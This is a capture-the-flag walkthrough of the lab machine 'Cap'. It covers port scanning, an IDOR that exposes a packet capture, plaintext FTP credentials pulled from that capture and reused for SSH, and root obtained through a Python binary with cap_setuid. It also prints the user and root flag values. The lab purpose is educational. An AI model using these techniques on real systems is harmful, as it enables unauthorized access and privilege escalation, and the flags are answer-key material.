Cap

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.245 -oN allPorts

-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Thu Mar  3 16:53:49 2022 as: nmap -sS -p- -T5 --min-rate 5000 -Pn -n -oN allPorts 10.10.10.245
Warning: 10.10.10.245 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.245
Host is up (0.049s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

# Nmap done at Thu Mar  3 16:54:06 2022 -- 1 IP address (1 host up) scanned in 17.22 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan those ports more in depth and save the result into a file:

nmap -sC -sV -p21,22,80 10.10.10.245 -oN targeted

-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Thu Mar  3 16:57:12 2022 as: nmap -sCV -p21,22,80 -T5 --min-rate 5000 -n -Pn -oN targeted 10.10.10.245
Nmap scan report for 10.10.10.245
Host is up (0.040s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    gunicorn
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     Server: gunicorn
|     Date: Thu, 03 Mar 2022 15:57:25 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Thu, 03 Mar 2022 15:57:20 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 19386
|     <!DOCTYPE html>
|     <html class="no-js" lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Security Dashboard</title>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
|     <link rel="stylesheet" href="/static/css/bootstrap.min.css">
|     <link rel="stylesheet" href="/static/css/font-awesome.min.css">
|     <link rel="stylesheet" href="/static/css/themify-icons.css">
|     <link rel="stylesheet" href="/static/css/metisMenu.css">
|     <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
|     <link rel="stylesheet" href="/static/css/slicknav.min.css">
|     <!-- amchar
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Thu, 03 Mar 2022 15:57:20 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Allow: GET, OPTIONS, HEAD
|     Content-Length: 0
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 196
|     <html>
|     <head>
|     <title>Bad Request</title>
|     </head>
|     <body>
|     <h1><p>Bad Request</p></h1>
|     Invalid HTTP Version &#x27;Invalid HTTP Version: &#x27;RTSP/1.0&#x27;&#x27;
|     </body>
|_    </html>
|_http-title: Security Dashboard
|_http-server-header: gunicorn
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.92%I=7%D=3/3%Time=6220E55F%P=x86_64-pc-linux-gnu%r(GetRe
SF:quest,2D5D,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:\x20T
SF:hu,\x2003\x20Mar\x202022\x2015:57:20\x20GMT\r\nConnection:\x20close\r\n
SF:Content-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x201938
SF:6\r\n\r\n<!DOCTYPE\x20html>\n<html\x20class=\"no-js\"\x20lang=\"en\">\n
SF:\n<head>\n\x20\x20\x20\x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x20
SF:<meta\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge\">\n\x20\x
SF:20\x20\x20<title>Security\x20Dashboard</title>\n\x20\x20\x20\x20<meta\x
SF:20name=\"viewport\"\x20content=\"width=device-width,\x20initial-scale=1
SF:\">\n\x20\x20\x20\x20<link\x20rel=\"shortcut\x20icon\"\x20type=\"image/
SF:png\"\x20href=\"/static/images/icon/favicon\.ico\">\n\x20\x20\x20\x20<l
SF:ink\x20rel=\"stylesheet\"\x20href=\"/static/css/bootstrap\.min\.css\">\
SF:n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/static/css/font
SF:-awesome\.min\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20h
SF:ref=\"/static/css/themify-icons\.css\">\n\x20\x20\x20\x20<link\x20rel=\
SF:"stylesheet\"\x20href=\"/static/css/metisMenu\.css\">\n\x20\x20\x20\x20
SF:<link\x20rel=\"stylesheet\"\x20href=\"/static/css/owl\.carousel\.min\.c
SF:ss\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/static/cs
SF:s/slicknav\.min\.css\">\n\x20\x20\x20\x20<!--\x20amchar")%r(HTTPOptions
SF:,B3,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:\x20Thu,\x20
SF:03\x20Mar\x202022\x2015:57:20\x20GMT\r\nConnection:\x20close\r\nContent
SF:-Type:\x20text/html;\x20charset=utf-8\r\nAllow:\x20GET,\x20OPTIONS,\x20
SF:HEAD\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest,121,"HTTP/1\.1\x20
SF:400\x20Bad\x20Request\r\nConnection:\x20close\r\nContent-Type:\x20text/
SF:html\r\nContent-Length:\x20196\r\n\r\n<html>\n\x20\x20<head>\n\x20\x20\
SF:x20\x20<title>Bad\x20Request</title>\n\x20\x20</head>\n\x20\x20<body>\n
SF:\x20\x20\x20\x20<h1><p>Bad\x20Request</p></h1>\n\x20\x20\x20\x20Invalid
SF:\x20HTTP\x20Version\x20&#x27;Invalid\x20HTTP\x20Version:\x20&#x27;RTSP/
SF:1\.0&#x27;&#x27;\n\x20\x20</body>\n</html>\n")%r(FourOhFourRequest,189,
SF:"HTTP/1\.0\x20404\x20NOT\x20FOUND\r\nServer:\x20gunicorn\r\nDate:\x20Th
SF:u,\x2003\x20Mar\x202022\x2015:57:25\x20GMT\r\nConnection:\x20close\r\nC
SF:ontent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20232\r
SF:\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x203\.2\x20F
SF:inal//EN\">\n<title>404\x20Not\x20Found</title>\n<h1>Not\x20Found</h1>\
SF:n<p>The\x20requested\x20URL\x20was\x20not\x20found\x20on\x20the\x20serv
SF:er\.\x20If\x20you\x20entered\x20the\x20URL\x20manually\x20please\x20che
SF:ck\x20your\x20spelling\x20and\x20try\x20again\.</p>\n");
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar  3 16:59:23 2022 -- 1 IP address (1 host up) scanned in 131.21 seconds

Let's take a look at the website on port 80.

Exploitation

If we take a look at the Security Snapshot (5 Second PCAP + Analysis) section, we'll access the /data/1 directory, which will show that the number of packets in all the data types are set to 0.

http://10.10.10.245/data/1

But if we try to change the number of the URL from 1 to 0, we'll see some packets in each data type. Also notice that there is a Download button.

http://10.10.10.245/data/0

If we press on the Download button, we'll download a .pcap file.

PCAP files are data files created by Wireshark, which contains network packet data created during a live network capture.

We can see its content from the terminal with the tshark tool.

tshark -r 0.pcap

-r read file.

Running as user "root" and group "root". This could be dangerous.
    1   0.000000 192.168.196.1 → 192.168.196.16 TCP 68 54399 → 80 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 WS=256 SACK_PERM=1
    2   0.000027 192.168.196.16 → 192.168.196.1 TCP 68 80 → 54399 [SYN, ACK] Seq=0 Ack=1 Win=64240 Len=0 MSS=1460 SACK_PERM=1 WS=128
    3   0.000190 192.168.196.1 → 192.168.196.16 TCP 62 54399 → 80 [ACK] Seq=1 Ack=1 Win=1051136 Len=0
    4   0.000241 192.168.196.1 → 192.168.196.16 HTTP 454 GET / HTTP/1.1 
    5   0.000246 192.168.196.16 → 192.168.196.1 TCP 56 80 → 54399 [ACK] Seq=1 Ack=399 Win=64128 Len=0
    6   0.001742 192.168.196.16 → 192.168.196.1 TCP 73 HTTP/1.0 200 OK  [TCP segment of a reassembled PDU]
    7   0.001858 192.168.196.16 → 192.168.196.1 HTTP 1434 HTTP/1.0 200 OK  (text/html)
    8   0.002121 192.168.196.1 → 192.168.196.16 TCP 62 54399 → 80 [ACK] Seq=399 Ack=1397 Win=1049600 Len=0
    9   0.002208 192.168.196.1 → 192.168.196.16 TCP 62 54399 → 80 [FIN, ACK] Seq=399 Ack=1397 Win=1049600 Len=0
   10   0.002222 192.168.196.16 → 192.168.196.1 TCP 56 80 → 54399 [ACK] Seq=1397 Ack=400 Win=64128 Len=0
   11   0.042235 192.168.196.1 → 192.168.196.16 TCP 68 54400 → 80 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 WS=256 SACK_PERM=1
   12   0.042273 192.168.196.16 → 192.168.196.1 TCP 68 80 → 54400 [SYN, ACK] Seq=0 Ack=1 Win=64240 Len=0 MSS=1460 SACK_PERM=1 WS=128
   13   0.042471 192.168.196.1 → 192.168.196.16 TCP 62 54400 → 80 [ACK] Seq=1 Ack=1 Win=1051136 Len=0
   14   0.042529 192.168.196.1 → 192.168.196.16 HTTP 416 GET /static/main.css HTTP/1.1 
   15   0.042535 192.168.196.16 → 192.168.196.1 TCP 56 80 → 54400 [ACK] Seq=1 Ack=361 Win=64128 Len=0
   16   0.044325 192.168.196.16 → 192.168.196.1 TCP 73 HTTP/1.0 200 OK  [TCP segment of a reassembled PDU]
   17   0.044465 192.168.196.16 → 192.168.196.1 HTTP 1047 HTTP/1.0 200 OK  (text/css)
   18   0.044759 192.168.196.1 → 192.168.196.16 TCP 62 54400 → 80 [ACK] Seq=361 Ack=1010 Win=1050112 Len=0
   19   0.044922 192.168.196.1 → 192.168.196.16 TCP 62 54400 → 80 [FIN, ACK] Seq=361 Ack=1010 Win=1050112 Len=0
   20   0.044937 192.168.196.16 → 192.168.196.1 TCP 56 80 → 54400 [ACK] Seq=1010 Ack=362 Win=64128 Len=0
   21   0.447917 192.168.196.1 → 192.168.196.16 TCP 68 54410 → 80 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 WS=256 SACK_PERM=1
   22   0.447952 192.168.196.16 → 192.168.196.1 TCP 68 80 → 54410 [SYN, ACK] Seq=0 Ack=1 Win=64240 Len=0 MSS=1460 SACK_PERM=1 WS=128
   23   0.448135 192.168.196.1 → 192.168.196.16 TCP 62 54410 → 80 [ACK] Seq=1 Ack=1 Win=1051136 Len=0
   24   0.448205 192.168.196.1 → 192.168.196.16 HTTP 408 GET /favicon.ico HTTP/1.1 
   25   0.448213 192.168.196.16 → 192.168.196.1 TCP 56 80 → 54410 [ACK] Seq=1 Ack=353 Win=64128 Len=0
   26   0.449720 192.168.196.16 → 192.168.196.1 TCP 80 HTTP/1.0 404 NOT FOUND  [TCP segment of a reassembled PDU]
   27   0.449869 192.168.196.16 → 192.168.196.1 HTTP 425 HTTP/1.0 404 NOT FOUND  (text/html)
   28   0.450003 192.168.196.1 → 192.168.196.16 TCP 62 54410 → 80 [ACK] Seq=353 Ack=395 Win=1050624 Len=0
   29   0.450176 192.168.196.1 → 192.168.196.16 TCP 62 54410 → 80 [FIN, ACK] Seq=353 Ack=395 Win=1050624 Len=0
   30   0.450189 192.168.196.16 → 192.168.196.1 TCP 56 80 → 54410 [ACK] Seq=395 Ack=354 Win=64128 Len=0
   31   2.624570 192.168.196.1 → 192.168.196.16 TCP 68 54411 → 21 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 WS=256 SACK_PERM=1
   32   2.624624 192.168.196.16 → 192.168.196.1 TCP 68 21 → 54411 [SYN, ACK] Seq=0 Ack=1 Win=64240 Len=0 MSS=1460 SACK_PERM=1 WS=128
   33   2.624934 192.168.196.1 → 192.168.196.16 TCP 62 54411 → 21 [ACK] Seq=1 Ack=1 Win=1051136 Len=0
   34   2.626895 192.168.196.16 → 192.168.196.1 FTP 76 Response: 220 (vsFTPd 3.0.3)
   35   2.667693 192.168.196.1 → 192.168.196.16 TCP 62 54411 → 21 [ACK] Seq=1 Ack=21 Win=1051136 Len=0
   36   4.126500 192.168.196.1 → 192.168.196.16 FTP 69 Request: USER nathan
   37   4.126526 192.168.196.16 → 192.168.196.1 TCP 56 21 → 54411 [ACK] Seq=21 Ack=14 Win=64256 Len=0
   38   4.126630 192.168.196.16 → 192.168.196.1 FTP 90 Response: 331 Please specify the password.
   39   4.167701 192.168.196.1 → 192.168.196.16 TCP 62 54411 → 21 [ACK] Seq=14 Ack=55 Win=1051136 Len=0
   40   5.424998 192.168.196.1 → 192.168.196.16 FTP 78 Request: PASS Buck3tH4TF0RM3!
   41   5.425034 192.168.196.16 → 192.168.196.1 TCP 56 21 → 54411 [ACK] Seq=55 Ack=36 Win=64256 Len=0
   42   5.432387 192.168.196.16 → 192.168.196.1 FTP 79 Response: 230 Login successful.
   43   5.432801 192.168.196.1 → 192.168.196.16 FTP 62 Request: SYST
   44   5.432834 192.168.196.16 → 192.168.196.1 TCP 56 21 → 54411 [ACK] Seq=78 Ack=42 Win=64256 Len=0
   45   5.432937 192.168.196.16 → 192.168.196.1 FTP 75 Response: 215 UNIX Type: L8
   46   5.478790 192.168.196.1 → 192.168.196.16 TCP 62 54411 → 21 [ACK] Seq=42 Ack=97 Win=1050880 Len=0
   47   6.309628 192.168.196.1 → 192.168.196.16 FTP 84 Request: PORT 192,168,196,1,212,140
   48   6.309655 192.168.196.16 → 192.168.196.1 TCP 56 21 → 54411 [ACK] Seq=97 Ack=70 Win=64256 Len=0
   49   6.309874 192.168.196.16 → 192.168.196.1 FTP 107 Response: 200 PORT command successful. Consider using PASV.
   50   6.310514 192.168.196.1 → 192.168.196.16 FTP 62 Request: LIST
   51   6.311053 192.168.196.16 → 192.168.196.1 FTP 95 Response: 150 Here comes the directory listing.
   52   6.311479 192.168.196.16 → 192.168.196.1 FTP 80 Response: 226 Directory send OK.
   53   6.311640 192.168.196.1 → 192.168.196.16 TCP 62 54411 → 21 [ACK] Seq=76 Ack=211 Win=1050880 Len=0
   54   7.380771 192.168.196.1 → 192.168.196.16 FTP 84 Request: PORT 192,168,196,1,212,141
   55   7.380998 192.168.196.16 → 192.168.196.1 FTP 107 Response: 200 PORT command successful. Consider using PASV.
   56   7.381554 192.168.196.1 → 192.168.196.16 FTP 66 Request: LIST -al
   57   7.382165 192.168.196.16 → 192.168.196.1 FTP 95 Response: 150 Here comes the directory listing.
   58   7.382504 192.168.196.16 → 192.168.196.1 FTP 80 Response: 226 Directory send OK.
   59   7.382637 192.168.196.1 → 192.168.196.16 TCP 62 54411 → 21 [ACK] Seq=114 Ack=325 Win=1050624 Len=0
   60  28.031068 192.168.196.1 → 192.168.196.16 FTP 64 Request: TYPE I
   61  28.031221 192.168.196.16 → 192.168.196.1 FTP 87 Response: 200 Switching to Binary mode.
   62  28.031547 192.168.196.1 → 192.168.196.16 FTP 84 Request: PORT 192,168,196,1,212,143
   63  28.031688 192.168.196.16 → 192.168.196.1 FTP 107 Response: 200 PORT command successful. Consider using PASV.
   64  28.031932 192.168.196.1 → 192.168.196.16 FTP 72 Request: RETR notes.txt
   65  28.032072 192.168.196.16 → 192.168.196.1 FTP 82 Response: 550 Failed to open file.
   66  28.074911 192.168.196.1 → 192.168.196.16 TCP 62 54411 → 21 [ACK] Seq=166 Ack=433 Win=1050624 Len=0
   67  31.127551 192.168.196.1 → 192.168.196.16 FTP 62 Request: QUIT
   68  31.127652 192.168.196.16 → 192.168.196.1 FTP 70 Response: 221 Goodbye.
   69  31.127696 192.168.196.16 → 192.168.196.1 TCP 56 21 → 54411 [FIN, ACK] Seq=447 Ack=172 Win=64256 Len=0
   70  31.128052 192.168.196.1 → 192.168.196.16 TCP 62 54411 → 21 [ACK] Seq=172 Ack=448 Win=1050624 Len=0
   71  31.128381 192.168.196.1 → 192.168.196.16 TCP 62 54411 → 21 [FIN, ACK] Seq=172 Ack=448 Win=1050624 Len=0
   72  31.128388 192.168.196.16 → 192.168.196.1 TCP 56 21 → 54411 [ACK] Seq=448 Ack=173 Win=64256 Len=0

Let's filter the output and only get the FTP packets.

tshark -r 0.pcap -Y "ftp"

-r read file.
-Y packets matching the filter are printed.

Running as user "root" and group "root". This could be dangerous.
   34   2.626895 192.168.196.16 → 192.168.196.1 FTP 76 Response: 220 (vsFTPd 3.0.3)
   36   4.126500 192.168.196.1 → 192.168.196.16 FTP 69 Request: USER nathan
   38   4.126630 192.168.196.16 → 192.168.196.1 FTP 90 Response: 331 Please specify the password.
   40   5.424998 192.168.196.1 → 192.168.196.16 FTP 78 Request: PASS Buck3tH4TF0RM3!
   42   5.432387 192.168.196.16 → 192.168.196.1 FTP 79 Response: 230 Login successful.
   43   5.432801 192.168.196.1 → 192.168.196.16 FTP 62 Request: SYST
   45   5.432937 192.168.196.16 → 192.168.196.1 FTP 75 Response: 215 UNIX Type: L8
   47   6.309628 192.168.196.1 → 192.168.196.16 FTP 84 Request: PORT 192,168,196,1,212,140
   49   6.309874 192.168.196.16 → 192.168.196.1 FTP 107 Response: 200 PORT command successful. Consider using PASV.
   50   6.310514 192.168.196.1 → 192.168.196.16 FTP 62 Request: LIST
   51   6.311053 192.168.196.16 → 192.168.196.1 FTP 95 Response: 150 Here comes the directory listing.
   52   6.311479 192.168.196.16 → 192.168.196.1 FTP 80 Response: 226 Directory send OK.
   54   7.380771 192.168.196.1 → 192.168.196.16 FTP 84 Request: PORT 192,168,196,1,212,141
   55   7.380998 192.168.196.16 → 192.168.196.1 FTP 107 Response: 200 PORT command successful. Consider using PASV.
   56   7.381554 192.168.196.1 → 192.168.196.16 FTP 66 Request: LIST -al
   57   7.382165 192.168.196.16 → 192.168.196.1 FTP 95 Response: 150 Here comes the directory listing.
   58   7.382504 192.168.196.16 → 192.168.196.1 FTP 80 Response: 226 Directory send OK.
   60  28.031068 192.168.196.1 → 192.168.196.16 FTP 64 Request: TYPE I
   61  28.031221 192.168.196.16 → 192.168.196.1 FTP 87 Response: 200 Switching to Binary mode.
   62  28.031547 192.168.196.1 → 192.168.196.16 FTP 84 Request: PORT 192,168,196,1,212,143
   63  28.031688 192.168.196.16 → 192.168.196.1 FTP 107 Response: 200 PORT command successful. Consider using PASV.
   64  28.031932 192.168.196.1 → 192.168.196.16 FTP 72 Request: RETR notes.txt
   65  28.032072 192.168.196.16 → 192.168.196.1 FTP 82 Response: 550 Failed to open file.
   67  31.127551 192.168.196.1 → 192.168.196.16 FTP 62 Request: QUIT
   68  31.127652 192.168.196.16 → 192.168.196.1 FTP 70 Response: 221 Goodbye.
s

We can see the user nathan logged in with the Buck3tH4TF0RM3! password to the FTP server. If we log in with these credentials in the FTP server, we'll see the user.txt file.

ftp nathan@10.10.10.245

Connected to 10.10.10.245.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password: Buck3tH4TF0RM3!
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||16427|)
150 Here comes the directory listing.
-r--------    1 1001     1001           33 Mar 03 19:23 user.txt
226 Directory send OK.

Let's transfer the file to our local machine and grab the user flag.

ftp> get user.txt

local: user.txt remote: user.txt
229 Entering Extended Passive Mode (|||29917|)
150 Opening BINARY mode data connection for user.txt (33 bytes).
100% |************************************************************************************************************************************************************************************************|    33       13.27 KiB/s    00:00 ETA
226 Transfer complete.
33 bytes received in 00:00 (0.62 KiB/s)
ftp> exit
221 Goodbye.

cat user.txt

905fe981897232bc127ca2ac039587a1

Privilege Escalation

Let's log in via SSH with the previous credentials.

ssh nathan@10.10.10.245

nathan@10.10.10.245's password: Buck3tH4TF0RM3!
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Mar  3 20:19:21 UTC 2022

  System load:           0.0
  Usage of /:            36.6% of 8.73GB
  Memory usage:          20%
  Swap usage:            0%
  Processes:             221
  Users logged in:       0
  IPv4 address for eth0: 10.10.10.245
  IPv6 address for eth0: dead:beef::250:56ff:feb9:9fc5

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

63 updates can be applied immediately.
42 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Thu May 27 11:21:27 2021 from 10.10.14.7
nathan@cap:~$

At this point, I started enumerating the machine looking for ways of becoming the root user, but I couldn't find anything until I listed the capabilities.

Linux divides the privileges traditionally associated with superuser into distinct units, known as capabilities, which can be independently enabled and disabled.

getcap / -r 2>/dev/null

-r enables recursive search.

/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip                                                                                                                                                                                     
/usr/bin/ping = cap_net_raw+ep                                                                                                                                                                                                               
/usr/bin/traceroute6.iputils = cap_net_raw+ep                                                                                                                                                                                                
/usr/bin/mtr-packet = cap_net_raw+ep                                                                                                                                                                                                         
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

We see, that Python3.8 has the cap_setuid capability. We can open python, set the 0 UID, which is the root UID, and open a shell.

python3.8

Python 3.8.5 (default, Jan 27 2021, 15:41:15)                                                                                                                                                                                                
[GCC 9.3.0] on linux                                                                                                                                                                                                                         
Type "help", "copyright", "credits" or "license" for more information.                                                                                                                                                                       
>>>

>>> import os
>>> os.setuid(0)
>>> os.system("bash")

root@cap:~# whoami                                                                                                                                                                                                                           
root

Now all we have to do is reap the harvest and take the root flag.

cat /root/root.txt

caad935ec8dd9312f2c1fe9a8b8f978d

Last updated 2 years ago

Was this helpful?